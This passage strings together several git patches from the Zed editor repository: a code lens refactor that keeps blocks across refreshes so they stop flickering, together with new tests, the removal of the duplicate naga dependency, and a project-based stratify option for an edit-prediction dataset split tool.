{r#" + <[fim-suffix]> + suffix + <[fim-prefix]>related.rs + fn helper() {} + + test.rs + prefix + <|marker_1|>edi<|user_cursor|>table<|marker_2|> + diagnostics + *missing semicolon*: + ``` + let value = 1 + ``` + <[fim-middle]>"#} + ); + } + #[test] fn test_v0317_formats_prompt_with_many_related_files() { let related_files = (0..900) From a3bb908192b88d55b3d95c0130f62b1b6af20dba Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Tue, 28 Apr 2026 11:59:39 +0200 Subject: [PATCH 072/231] Avoid flickering when displaying code lens (#55075) Follow-up to https://github.com/zed-industries/zed/pull/54100 Closes https://github.com/zed-industries/zed/issues/55046 Before: https://github.com/user-attachments/assets/d4730342-3526-48a8-8050-b398725a2cb9 After: https://github.com/user-attachments/assets/5493a0a1-3a8e-4215-a10c-8cd9bb04141d Release Notes: - Fixed code lens flickering when typing --- crates/editor/src/code_lens.rs | 794 ++++++++++++++++++++++----------- 1 file changed, 528 insertions(+), 266 deletions(-) diff --git a/crates/editor/src/code_lens.rs b/crates/editor/src/code_lens.rs index e93757cb3a0918..c123eceea3d125 100644 --- a/crates/editor/src/code_lens.rs +++ b/crates/editor/src/code_lens.rs @@ -14,7 +14,7 @@ use ui::{Context, Window, div, prelude::*}; use crate::{ Editor, LSP_REQUEST_DEBOUNCE_TIMEOUT, SelectionEffects, actions::ToggleCodeLens, - display_map::{BlockPlacement, BlockProperties, BlockStyle, CustomBlockId}, + display_map::{BlockPlacement, BlockProperties, BlockStyle, CustomBlockId, RenderBlock}, hover_links::HoverLink, }; @@ -31,147 +31,28 @@ struct CodeLensItem { action: CodeAction, } +pub(super) struct CodeLensBlock { + block_id: CustomBlockId, + anchor: Anchor, + line: CodeLensLine, +} + pub(super) struct CodeLensState { - pub(super) block_ids: HashMap>, + pub(super) blocks: HashMap>, + actions: HashMap>, resolve_task: Task<()>, } impl Default for CodeLensState { fn default() -> Self { Self { - block_ids: HashMap::default(), + blocks: 
HashMap::default(), + actions: HashMap::default(), resolve_task: Task::ready(()), } } } -impl CodeLensState { - fn all_block_ids(&self) -> HashSet { - self.block_ids.values().flatten().copied().collect() - } -} - -fn group_lenses_by_row( - lenses: Vec<(Anchor, CodeLensItem)>, - snapshot: &MultiBufferSnapshot, -) -> impl Iterator { - lenses - .into_iter() - .into_group_map_by(|(position, _)| { - let row = position.to_point(snapshot).row; - MultiBufferRow(row) - }) - .into_iter() - .sorted_by_key(|(row, _)| *row) - .filter_map(|(row, entries)| { - let position = entries.first()?.0; - let items = entries.into_iter().map(|(_, item)| item).collect(); - let indent_column = snapshot.indent_size_for_line(row).len; - Some(CodeLensLine { - position, - indent_column, - items, - }) - }) -} - -fn render_code_lens_line( - lens: CodeLensLine, - editor: WeakEntity, -) -> impl Fn(&mut crate::display_map::BlockContext) -> gpui::AnyElement { - move |cx| { - let mut children = Vec::with_capacity((2 * lens.items.len()).saturating_sub(1)); - let text_style = &cx.editor_style.text; - let font = text_style.font(); - let font_size = text_style.font_size.to_pixels(cx.window.rem_size()) * 0.9; - - for (i, item) in lens.items.iter().enumerate() { - if i > 0 { - children.push( - div() - .font(font.clone()) - .text_size(font_size) - .text_color(cx.app.theme().colors().text_muted) - .child(" | ") - .into_any_element(), - ); - } - - let title = item.title.clone(); - let action = item.action.clone(); - let editor_handle = editor.clone(); - let position = lens.position; - - children.push( - div() - .id(ElementId::from(i)) - .font(font.clone()) - .text_size(font_size) - .text_color(cx.app.theme().colors().text_muted) - .cursor_pointer() - .hover(|style| style.text_color(cx.app.theme().colors().text)) - .child(title.clone()) - .on_mouse_down(MouseButton::Left, |_, _, cx| { - cx.stop_propagation(); - }) - .on_mouse_down(MouseButton::Right, |_, _, cx| { - cx.stop_propagation(); - }) - .on_click({ - 
move |_event, window, cx| { - if let Some(editor) = editor_handle.upgrade() { - editor.update(cx, |editor, cx| { - editor.change_selections( - SelectionEffects::default(), - window, - cx, - |s| { - s.select_anchor_ranges([position..position]); - }, - ); - - let action = action.clone(); - if let Some(workspace) = editor.workspace() { - if try_handle_client_command( - &action, editor, &workspace, window, cx, - ) { - return; - } - - let project = workspace.read(cx).project().clone(); - if let Some(buffer) = editor - .buffer() - .read(cx) - .buffer(action.range.start.buffer_id) - { - project - .update(cx, |project, cx| { - project - .apply_code_action(buffer, action, true, cx) - }) - .detach_and_log_err(cx); - } - } - }); - } - } - }) - .into_any_element(), - ); - } - - div() - .id(cx.block_id) - .pl(cx.margins.gutter.full_width() + cx.em_width * (lens.indent_column as f32 + 0.5)) - .h_full() - .flex() - .flex_row() - .items_end() - .children(children) - .into_any_element() - } -} - pub(super) fn try_handle_client_command( action: &CodeAction, editor: &mut Editor, @@ -345,94 +226,169 @@ impl Editor { return; } - let Ok(multi_buffer_snapshot) = - editor.update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) - else { - return; - }; - - let mut new_lenses_per_buffer = HashMap::default(); - for (buffer_id, result) in results { - let actions = match result { - Ok(Some(actions)) => actions, - Ok(None) => continue, - Err(e) => { - log::error!("Failed to fetch code lenses for buffer {buffer_id:?}: {e:#}"); - continue; - } - }; - let individual_lenses = actions - .into_iter() - .filter_map(|action| { - let title = match &action.lsp_action { - project::LspAction::CodeLens(lens) => lens - .command - .as_ref() - .map(|cmd| SharedString::from(&cmd.title)), - _ => None, - }?; - let position = - multi_buffer_snapshot.anchor_in_excerpt(action.range.start)?; - Some((position, CodeLensItem { title, action })) - }) - .collect(); - new_lenses_per_buffer.insert( - buffer_id, - 
group_lenses_by_row(individual_lenses, &multi_buffer_snapshot) - .collect::>(), - ); - } - editor .update(cx, |editor, cx| { - let code_lens = editor.code_lens.get_or_insert_with(CodeLensState::default); - let mut blocks_to_remove = HashSet::default(); - for buffer_id in new_lenses_per_buffer.keys() { - if let Some(old_ids) = code_lens.block_ids.remove(buffer_id) { - blocks_to_remove.extend(old_ids); - } - } - if !blocks_to_remove.is_empty() { - editor.remove_blocks(blocks_to_remove, None, cx); - } - - let editor_handle = cx.entity().downgrade(); - for (buffer_id, lens_lines) in new_lenses_per_buffer { - if lens_lines.is_empty() { - continue; - } - let blocks = lens_lines - .into_iter() - .map(|lens_line| { - let position = lens_line.position; - BlockProperties { - placement: BlockPlacement::Above(position), - height: Some(1), - style: BlockStyle::Flex, - render: Arc::new(render_code_lens_line( - lens_line, - editor_handle.clone(), - )), - priority: 0, - } - }) - .collect::>(); - let block_ids = editor.insert_blocks(blocks, None, cx); - editor - .code_lens - .get_or_insert_with(CodeLensState::default) - .block_ids - .entry(buffer_id) - .or_default() - .extend(block_ids); + let snapshot = editor.buffer().read(cx).snapshot(cx); + for (buffer_id, result) in results { + let actions = match result { + Ok(Some(actions)) => actions, + Ok(None) => continue, + Err(e) => { + log::error!( + "Failed to fetch code lenses for buffer {buffer_id:?}: {e:#}" + ); + continue; + } + }; + editor.apply_lens_actions_for_buffer(buffer_id, actions, &snapshot, cx); } - editor.resolve_visible_code_lenses(cx); }) .ok(); }); } + /// Reconciles the set of blocks for `buffer_id` with `actions`. For each + /// existing block at row `R`: + /// - if the new fetch has no lens at `R` → remove the block (the lens is + /// gone, e.g. 
the function was deleted); + /// - if the new fetch has a titled lens at `R` whose rendered text + /// differs from the block's current line → swap the renderer in place + /// via [`Editor::replace_blocks`]; + /// - if the new fetch has a titled lens at `R` with the same rendered + /// text → keep the block as-is; + /// - if the new fetch has a lens at `R` but no `command` yet (the server + /// sent a shallow response that needs a separate `resolve`) → keep the + /// block as-is. The previously rendered (resolved) content stays on + /// screen until the next viewport-driven `resolve` produces a new + /// title; only then does the comparison-and-replace happen. This is + /// what keeps the post-edit screen from flickering for shallow servers + /// like `rust-analyzer`. + /// + /// Rows present in the new fetch with a title but no existing block get + /// a fresh block inserted. + fn apply_lens_actions_for_buffer( + &mut self, + buffer_id: BufferId, + actions: Vec, + snapshot: &MultiBufferSnapshot, + cx: &mut Context, + ) { + let mut rows_with_any_lens = HashSet::default(); + let mut titled_lenses = Vec::new(); + for action in &actions { + let Some(position) = snapshot.anchor_in_excerpt(action.range.start) else { + continue; + }; + + rows_with_any_lens.insert(MultiBufferRow(position.to_point(snapshot).row)); + if let project::LspAction::CodeLens(lens) = &action.lsp_action { + if let Some(title) = lens + .command + .as_ref() + .map(|cmd| SharedString::from(&cmd.title)) + { + titled_lenses.push(( + position, + CodeLensItem { + title, + action: action.clone(), + }, + )); + } + } + } + + let mut new_lines_by_row = group_lenses_by_row(titled_lenses, snapshot) + .map(|line| (MultiBufferRow(line.position.to_point(snapshot).row), line)) + .collect::>(); + + let editor_handle = cx.entity().downgrade(); + let code_lens = self.code_lens.get_or_insert_with(CodeLensState::default); + let old_blocks = code_lens.blocks.remove(&buffer_id).unwrap_or_default(); + + let mut kept_blocks 
= Vec::new(); + let mut renderers_to_replace = HashMap::default(); + let mut blocks_to_remove = HashSet::default(); + let mut covered_rows = HashSet::default(); + + for old in old_blocks { + let row = MultiBufferRow(old.anchor.to_point(snapshot).row); + if !rows_with_any_lens.contains(&row) { + blocks_to_remove.insert(old.block_id); + continue; + } + covered_rows.insert(row); + let Some(new_line) = new_lines_by_row.remove(&row) else { + kept_blocks.push(old); + continue; + }; + if rendered_text_matches(&old.line, &new_line) { + kept_blocks.push(old); + } else { + let mut updated = old; + updated.line = new_line.clone(); + renderers_to_replace.insert( + updated.block_id, + build_code_lens_renderer(new_line, editor_handle.clone()), + ); + kept_blocks.push(updated); + } + } + + let mut to_insert = Vec::new(); + for (row, new_line) in new_lines_by_row { + if covered_rows.contains(&row) { + continue; + } + let anchor = new_line.position; + let props = BlockProperties { + placement: BlockPlacement::Above(anchor), + height: Some(1), + style: BlockStyle::Flex, + render: build_code_lens_renderer(new_line.clone(), editor_handle.clone()), + priority: 0, + }; + to_insert.push((props, anchor, new_line)); + } + + if !blocks_to_remove.is_empty() { + self.remove_blocks(blocks_to_remove, None, cx); + } + if !renderers_to_replace.is_empty() { + self.replace_blocks(renderers_to_replace, None, cx); + } + if !to_insert.is_empty() { + let mut props = Vec::with_capacity(to_insert.len()); + let mut metadata = Vec::with_capacity(to_insert.len()); + for (p, anchor, line) in to_insert { + props.push(p); + metadata.push((anchor, line)); + } + let block_ids = self.insert_blocks(props, None, cx); + for (block_id, (anchor, line)) in block_ids.into_iter().zip(metadata) { + kept_blocks.push(CodeLensBlock { + block_id, + anchor, + line, + }); + } + } + + let code_lens = self.code_lens.get_or_insert_with(CodeLensState::default); + if actions.is_empty() { + code_lens.actions.remove(&buffer_id); + } 
else { + code_lens.actions.insert(buffer_id, actions); + } + if kept_blocks.is_empty() { + code_lens.blocks.remove(&buffer_id); + } else { + code_lens.blocks.insert(buffer_id, kept_blocks); + } + cx.notify(); + } + pub fn supports_code_lens(&self, cx: &ui::App) -> bool { let Some(project) = self.project.as_ref() else { return false; @@ -502,7 +458,7 @@ impl Editor { let code_lens = self.code_lens.get_or_insert_with(CodeLensState::default); code_lens.resolve_task = cx.spawn(async move |editor, cx| { - let resolved_code_lens = join_all( + let resolved_per_buffer = join_all( resolve_tasks .into_iter() .map(|(buffer_id, task)| async move { (buffer_id, task.await) }), @@ -510,65 +466,42 @@ impl Editor { .await; editor .update(cx, |editor, cx| { - editor.insert_resolved_code_lens_blocks(resolved_code_lens, cx); - }) - .ok(); - }); - } - - fn insert_resolved_code_lens_blocks( - &mut self, - resolved_code_lens: Vec<(BufferId, Vec)>, - cx: &mut Context, - ) { - let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); - let editor_handle = cx.entity().downgrade(); - - for (buffer_id, actions) in resolved_code_lens { - let lenses = actions - .into_iter() - .filter_map(|action| { - let title = match &action.lsp_action { - project::LspAction::CodeLens(lens) => lens - .command + let snapshot = editor.buffer().read(cx).snapshot(cx); + for (buffer_id, newly_resolved) in resolved_per_buffer { + if newly_resolved.is_empty() { + continue; + } + let Some(mut actions) = editor + .code_lens .as_ref() - .map(|cmd| SharedString::from(&cmd.title)), - _ => None, - }?; - let position = multi_buffer_snapshot.anchor_in_excerpt(action.range.start)?; - Some((position, CodeLensItem { title, action })) - }) - .collect(); - - let blocks = group_lenses_by_row(lenses, &multi_buffer_snapshot) - .map(|lens_line| { - let position = lens_line.position; - BlockProperties { - placement: BlockPlacement::Above(position), - height: Some(1), - style: BlockStyle::Flex, - render: 
Arc::new(render_code_lens_line(lens_line, editor_handle.clone())), - priority: 0, + .and_then(|state| state.actions.get(&buffer_id)) + .cloned() + else { + continue; + }; + for resolved in newly_resolved { + if let Some(unresolved) = actions.iter_mut().find(|action| { + action.server_id == resolved.server_id + && action.range == resolved.range + }) { + *unresolved = resolved; + } + } + editor.apply_lens_actions_for_buffer(buffer_id, actions, &snapshot, cx); } }) - .collect::>(); - - if !blocks.is_empty() { - let block_ids = self.insert_blocks(blocks, None, cx); - self.code_lens - .get_or_insert_with(CodeLensState::default) - .block_ids - .entry(buffer_id) - .or_default() - .extend(block_ids); - } - } - cx.notify(); + .ok(); + }); } pub(super) fn clear_code_lenses(&mut self, cx: &mut Context) { if let Some(code_lens) = self.code_lens.take() { - let all_blocks = code_lens.all_block_ids(); + let all_blocks = code_lens + .blocks + .into_values() + .flatten() + .map(|block| block.block_id) + .collect::>(); if !all_blocks.is_empty() { self.remove_blocks(all_blocks, None, cx); } @@ -578,6 +511,138 @@ impl Editor { } } +/// Whether two lens lines would render the same on screen — same indent +/// and same titles in the same order. Used to skip recreating a renderer +/// (and thus a click handler) when nothing about the displayed line +/// changed; the captured [`CodeAction`] inside the existing renderer keeps +/// pointing at the right spot because its anchors track buffer edits. 
+fn rendered_text_matches(a: &CodeLensLine, b: &CodeLensLine) -> bool { + a.indent_column == b.indent_column + && a.items.len() == b.items.len() + && a.items + .iter() + .zip(&b.items) + .all(|(x, y)| x.title == y.title) +} + +fn group_lenses_by_row( + lenses: Vec<(Anchor, CodeLensItem)>, + snapshot: &MultiBufferSnapshot, +) -> impl Iterator { + lenses + .into_iter() + .into_group_map_by(|(position, _)| { + let row = position.to_point(snapshot).row; + MultiBufferRow(row) + }) + .into_iter() + .sorted_by_key(|(row, _)| *row) + .filter_map(|(row, entries)| { + let position = entries.first()?.0; + let items = entries.into_iter().map(|(_, item)| item).collect(); + let indent_column = snapshot.indent_size_for_line(row).len; + Some(CodeLensLine { + position, + indent_column, + items, + }) + }) +} + +fn build_code_lens_renderer(line: CodeLensLine, editor: WeakEntity) -> RenderBlock { + Arc::new(move |cx| { + let mut children = Vec::with_capacity((2 * line.items.len()).saturating_sub(1)); + let text_style = &cx.editor_style.text; + let font = text_style.font(); + let font_size = text_style.font_size.to_pixels(cx.window.rem_size()) * 0.9; + + for (i, item) in line.items.iter().enumerate() { + if i > 0 { + children.push( + div() + .font(font.clone()) + .text_size(font_size) + .text_color(cx.app.theme().colors().text_muted) + .child(" | ") + .into_any_element(), + ); + } + + let title = item.title.clone(); + let action = item.action.clone(); + let position = line.position; + let editor_handle = editor.clone(); + + children.push( + div() + .id(ElementId::from(i)) + .font(font.clone()) + .text_size(font_size) + .text_color(cx.app.theme().colors().text_muted) + .cursor_pointer() + .hover(|style| style.text_color(cx.app.theme().colors().text)) + .child(title) + .on_mouse_down(MouseButton::Left, |_, _, cx| { + cx.stop_propagation(); + }) + .on_mouse_down(MouseButton::Right, |_, _, cx| { + cx.stop_propagation(); + }) + .on_click({ + move |_event, window, cx| { + if let Some(editor) 
= editor_handle.upgrade() { + editor.update(cx, |editor, cx| { + editor.change_selections( + SelectionEffects::default(), + window, + cx, + |s| { + s.select_anchor_ranges([position..position]); + }, + ); + + let action = action.clone(); + if let Some(workspace) = editor.workspace() { + if try_handle_client_command( + &action, editor, &workspace, window, cx, + ) { + return; + } + + let project = workspace.read(cx).project().clone(); + if let Some(buffer) = editor + .buffer() + .read(cx) + .buffer(action.range.start.buffer_id) + { + project + .update(cx, |project, cx| { + project + .apply_code_action(buffer, action, true, cx) + }) + .detach_and_log_err(cx); + } + } + }); + } + } + }) + .into_any_element(), + ); + } + + div() + .id(cx.block_id) + .pl(cx.margins.gutter.full_width() + cx.em_width * (line.indent_column as f32 + 0.5)) + .h_full() + .flex() + .flex_row() + .items_end() + .children(children) + .into_any_element() + }) +} + #[cfg(test)] mod tests { use std::{ @@ -592,7 +657,7 @@ mod tests { use util::path; use crate::{ - Editor, + Editor, LSP_REQUEST_DEBOUNCE_TIMEOUT, editor_tests::{init_test, update_test_editor_settings}, test::editor_lsp_test_context::EditorLspTestContext, }; @@ -660,12 +725,209 @@ mod tests { let total_blocks: usize = editor .code_lens .as_ref() - .map(|s| s.block_ids.values().map(|v| v.len()).sum()) + .map(|s| s.blocks.values().map(|v| v.len()).sum()) .unwrap_or(0); assert_eq!(total_blocks, 2, "Should have inserted two code lens blocks"); }); } + #[gpui::test] + async fn test_code_lens_blocks_kept_across_refresh(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + update_test_editor_settings(cx, &|settings| { + settings.code_lens = Some(CodeLens::On); + }); + + let mut cx = EditorLspTestContext::new_typescript( + lsp::ServerCapabilities { + code_lens_provider: Some(lsp::CodeLensOptions { + resolve_provider: None, + }), + execute_command_provider: Some(lsp::ExecuteCommandOptions { + commands: vec!["lens_cmd".to_string()], + 
..lsp::ExecuteCommandOptions::default() + }), + ..lsp::ServerCapabilities::default() + }, + cx, + ) + .await; + + let mut code_lens_request = + cx.set_request_handler::(move |_, _, _| async { + Ok(Some(vec![lsp::CodeLens { + range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 19)), + command: Some(lsp::Command { + title: "1 reference".to_owned(), + command: "lens_cmd".to_owned(), + arguments: None, + }), + data: None, + }])) + }); + + cx.set_state("ˇfunction hello() {}\nfunction world() {}"); + + assert!( + code_lens_request.next().await.is_some(), + "should have received the initial code lens request" + ); + cx.run_until_parked(); + + let initial_block_ids = cx.editor.read_with(&cx.cx.cx, |editor, _| { + editor + .code_lens + .as_ref() + .map(|s| { + s.blocks + .values() + .flatten() + .map(|b| b.block_id) + .collect::>() + }) + .unwrap_or_default() + }); + assert_eq!( + initial_block_ids.len(), + 1, + "Should have one initial code lens block" + ); + + cx.update_editor(|editor, window, cx| { + editor.move_to_end(&crate::actions::MoveToEnd, window, cx); + editor.handle_input("\n// trailing comment", window, cx); + }); + cx.executor() + .advance_clock(LSP_REQUEST_DEBOUNCE_TIMEOUT + Duration::from_millis(50)); + assert!( + code_lens_request.next().await.is_some(), + "should have received another code lens request after edit" + ); + cx.run_until_parked(); + + let refreshed_block_ids = cx.editor.read_with(&cx.cx.cx, |editor, _| { + editor + .code_lens + .as_ref() + .map(|s| { + s.blocks + .values() + .flatten() + .map(|b| b.block_id) + .collect::>() + }) + .unwrap_or_default() + }); + assert_eq!( + refreshed_block_ids, initial_block_ids, + "Code lens blocks should be preserved across refreshes when their content is unchanged" + ); + } + + #[gpui::test] + async fn test_code_lens_blocks_kept_when_only_resolve_fills_titles(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + update_test_editor_settings(cx, &|settings| { + settings.code_lens = 
Some(CodeLens::On); + }); + + let mut cx = EditorLspTestContext::new_typescript( + lsp::ServerCapabilities { + code_lens_provider: Some(lsp::CodeLensOptions { + resolve_provider: Some(true), + }), + ..lsp::ServerCapabilities::default() + }, + cx, + ) + .await; + + // The LSP returns shallow code lenses on every fetch; only `resolve` + // populates the command/title. This is the realistic flow with + // servers like rust-analyzer and exercises the path where each + // post-edit refresh comes back unresolved before the resolve catches + // up. + let mut code_lens_request = + cx.set_request_handler::(move |_, _, _| async { + Ok(Some(vec![lsp::CodeLens { + range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 19)), + command: None, + data: Some(serde_json::json!({"id": "lens_1"})), + }])) + }); + + cx.lsp + .set_request_handler::(|lens, _| async move { + Ok(lsp::CodeLens { + command: Some(lsp::Command { + title: "1 reference".to_owned(), + command: "resolved_cmd".to_owned(), + arguments: None, + }), + ..lens + }) + }); + + cx.set_state("ˇfunction hello() {}\nfunction world() {}"); + + assert!( + code_lens_request.next().await.is_some(), + "should have received the initial code lens request" + ); + cx.run_until_parked(); + + let initial = cx.editor.read_with(&cx.cx.cx, |editor, _| { + editor + .code_lens + .as_ref() + .map(|s| { + s.blocks + .values() + .flatten() + .map(|b| b.block_id) + .collect::>() + }) + .unwrap_or_default() + }); + assert_eq!( + initial.len(), + 1, + "resolve should have inserted exactly one block from the shallow lens" + ); + + for keystroke in [" ", "x", "y"] { + cx.update_editor(|editor, window, cx| { + editor.move_to_end(&crate::actions::MoveToEnd, window, cx); + editor.handle_input(keystroke, window, cx); + }); + cx.executor() + .advance_clock(LSP_REQUEST_DEBOUNCE_TIMEOUT + Duration::from_millis(50)); + assert!( + code_lens_request.next().await.is_some(), + "should have received another (shallow) code lens request after edit" 
+ ); + cx.run_until_parked(); + + let after = cx.editor.read_with(&cx.cx.cx, |editor, _| { + editor + .code_lens + .as_ref() + .map(|s| { + s.blocks + .values() + .flatten() + .map(|b| b.block_id) + .collect::>() + }) + .unwrap_or_default() + }); + assert_eq!( + after, initial, + "Block IDs must survive the unresolved-fetch → resolve cycle without churn" + ); + } + } + #[gpui::test] async fn test_code_lens_disabled_by_default(cx: &mut TestAppContext) { init_test(cx, |_| {}); @@ -754,7 +1016,7 @@ mod tests { let total_blocks: usize = editor .code_lens .as_ref() - .map(|s| s.block_ids.values().map(|v| v.len()).sum()) + .map(|s| s.blocks.values().map(|v| v.len()).sum()) .unwrap_or(0); assert_eq!(total_blocks, 1, "Should have one code lens block"); }); @@ -841,7 +1103,7 @@ mod tests { let total_blocks: usize = editor .code_lens .as_ref() - .map(|s| s.block_ids.values().map(|v| v.len()).sum()) + .map(|s| s.blocks.values().map(|v| v.len()).sum()) .unwrap_or(0); assert_eq!( total_blocks, 2, From 47e25758cfce41ce8b7b14aa2d5cf6aa41dacba6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Miguel=20Raz=20Guzm=C3=A1n=20Macedo?= Date: Tue, 28 Apr 2026 12:00:07 +0200 Subject: [PATCH 073/231] gpui: Remove naga dependency (#55070) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes https://github.com/zed-industries/zed/issues/54981#issuecomment-4333425722 Release Notes: - N/A or Added/Fixed/Improved ... 
--- Cargo.lock | 34 ++++------------------------------ Cargo.toml | 1 - crates/gpui/Cargo.toml | 1 - 3 files changed, 4 insertions(+), 32 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 2457f314e32ab6..5163528b0550f3 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -7675,7 +7675,6 @@ dependencies = [ "mach2 0.5.0", "media", "metal", - "naga 29.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "num_cpus", "objc", "objc2", @@ -10941,31 +10940,6 @@ version = "0.8.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e5ce46fe64a9d73be07dcbe690a38ce1b293be448fd8ce1e6c1b8062c9f72c6a" -[[package]] -name = "naga" -version = "29.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "85b4372fed0bd362d646d01b6926df0e837859ccc522fed720c395e0460f29c8" -dependencies = [ - "arrayvec", - "bit-set 0.9.1", - "bitflags 2.10.0", - "cfg-if", - "cfg_aliases 0.2.1", - "codespan-reporting", - "half", - "hashbrown 0.16.1", - "hexf-parse", - "indexmap 2.11.4", - "libm", - "log", - "num-traits", - "once_cell", - "rustc-hash 1.1.0", - "thiserror 2.0.17", - "unicode-ident", -] - [[package]] name = "naga" version = "29.0.0" @@ -20519,7 +20493,7 @@ dependencies = [ "hashbrown 0.16.1", "js-sys", "log", - "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "naga", "parking_lot", "portable-atomic", "profiling", @@ -20549,7 +20523,7 @@ dependencies = [ "hashbrown 0.16.1", "indexmap 2.11.4", "log", - "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "naga", "once_cell", "parking_lot", "portable-atomic", @@ -20614,7 +20588,7 @@ dependencies = [ "libc", "libloading", "log", - "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "naga", "ndk-sys", "objc2", "objc2-core-foundation", @@ -20647,7 +20621,7 @@ name = "wgpu-naga-bridge" version = "29.0.0" source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" 
dependencies = [ - "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "naga", "wgpu-types", ] diff --git a/Cargo.toml b/Cargo.toml index 69d2a5c2f59ecc..bf87ff22e5bc04 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -622,7 +622,6 @@ markup5ever_rcdom = "0.3.0" metal = "0.33" minidumper = "0.9" moka = { version = "0.12.10", features = ["sync"] } -naga = { version = "29.0", features = ["wgsl-in"] } nanoid = "0.4" nbformat = "1.2.0" nix = "0.29" diff --git a/crates/gpui/Cargo.toml b/crates/gpui/Cargo.toml index 38a8c6134d1aa4..d7e69c7b19cac9 100644 --- a/crates/gpui/Cargo.toml +++ b/crates/gpui/Cargo.toml @@ -171,7 +171,6 @@ embed-resource = { version = "3.0", optional = true } [target.'cfg(target_os = "macos")'.build-dependencies] bindgen = "0.71" cbindgen = { version = "0.28.0", default-features = false } -naga.workspace = true From 90f49d8e54738024cb53ee4b75a6aa10ccce1f9e Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Tue, 28 Apr 2026 15:33:48 +0300 Subject: [PATCH 074/231] ep: Add option to split datasets by project (#55071) `ep split --stratify=project` will use the first component of `cursor_path`, which is a worktree name. This is an alternative to `--stratify=repo` in absence of `repository_url` Release Notes: - N/A --- .../edit_prediction_cli/src/split_dataset.rs | 93 +++++++++++++++++-- 1 file changed, 84 insertions(+), 9 deletions(-) diff --git a/crates/edit_prediction_cli/src/split_dataset.rs b/crates/edit_prediction_cli/src/split_dataset.rs index f1e0a672695cb9..d1cf602f1f47ce 100644 --- a/crates/edit_prediction_cli/src/split_dataset.rs +++ b/crates/edit_prediction_cli/src/split_dataset.rs @@ -22,6 +22,7 @@ //! The `--stratify` flag controls how examples are grouped before splitting: //! //! - `cursor-path` (default): group by the `cursor_path` JSON field +//! - `project`: group by the first component of the `cursor_path` JSON field //! - `repo`: group by the `repository_url` JSON field //! 
- `none`: no grouping, split individual examples //! @@ -35,7 +36,7 @@ use clap::Args; use rand::SeedableRng; use rand::seq::SliceRandom; use serde_json::Value; -use std::collections::HashMap; +use std::collections::BTreeMap; use std::fs::File; use std::io::{self, BufRead, BufReader, BufWriter, Write}; use std::path::{Path, PathBuf}; @@ -74,6 +75,7 @@ EXAMPLES: STRATIFICATION: Controls how examples are grouped before splitting: cursor-path Group by "cursor_path" field (default) + project Group by the first component of the "cursor_path" field repo Group by "repository_url" field none No grouping, split individual examples @@ -96,6 +98,8 @@ pub struct SplitArgs { pub enum Stratify { #[strum(serialize = "cursor_path")] CursorPath, + #[strum(serialize = "project")] + Project, #[strum(serialize = "repo")] Repo, #[strum(serialize = "none")] @@ -324,19 +328,31 @@ fn group_lines(lines: &[String], stratify: Stratify) -> Vec> { return lines.iter().map(|line| vec![line.clone()]).collect(); } - let field = match stratify { - Stratify::Repo => "repository_url", - Stratify::CursorPath => "cursor_path", - Stratify::None => unreachable!(), + let get_key = |line: &str| { + let json: Value = serde_json::from_str(line).unwrap_or_default(); + match stratify { + Stratify::Repo => json + .get("repository_url") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()), + Stratify::CursorPath => json + .get("cursor_path") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()), + Stratify::Project => json + .get("cursor_path") + .and_then(|v| v.as_str()) + .and_then(|s| s.split(['/', '\\']).next()) + .map(|s| s.to_string()), + Stratify::None => unreachable!(), + } }; - let mut groups: HashMap> = HashMap::new(); + let mut groups: BTreeMap> = BTreeMap::new(); let mut ungrouped: Vec> = Vec::new(); for line in lines { - let key = serde_json::from_str::(line) - .ok() - .and_then(|v| v.get(field)?.as_str().map(|s| s.to_string())); + let key = get_key(line); match key { Some(key) => 
groups.entry(key).or_default().push(line.clone()), None => ungrouped.push(vec![line.clone()]), @@ -601,4 +617,63 @@ mod tests { assert_eq!(train_lines.len(), 6); assert_eq!(valid_lines.len(), 9); } + + #[test] + fn test_stratify_by_project() { + // 5 repos × 3 lines each = 15 total lines. + // `train=6` should target ~6 lines (2 groups), NOT 6 groups (all 15 lines). + let input = create_temp_jsonl(&[ + r#"{"cursor_path": "project1/some/file.rs", "id": 1}"#, + r#"{"cursor_path": "project2/some/file.rs", "id": 2}"#, + r#"{"cursor_path": "project3/some/file.rs", "id": 3}"#, + r#"{"cursor_path": "project1/other/file.rs", "id": 4}"#, + r#"{"cursor_path": "project2/other/file.rs", "id": 5}"#, + r#"{"cursor_path": "project3/other/file.rs", "id": 6}"#, + r#"{"cursor_path": "project3/another/file.rs", "id": 7}"#, + r#"{"cursor_path": "project3/even/more.rs", "id": 8}"#, + ]); + + let temp_dir = tempfile::tempdir().unwrap(); + let train_path = temp_dir.path().join("train.jsonl"); + let valid_path = temp_dir.path().join("valid.jsonl"); + + let args = SplitArgs { + seed: Some(1), + stratify: Stratify::Project, + }; + let inputs = vec![ + input.path().to_path_buf(), + PathBuf::from(format!("{}=4", train_path.display())), + PathBuf::from(format!("{}=rest", valid_path.display())), + ]; + + run_split(&args, &inputs).unwrap(); + + let train_content = std::fs::read_to_string(&train_path).unwrap(); + let valid_content = 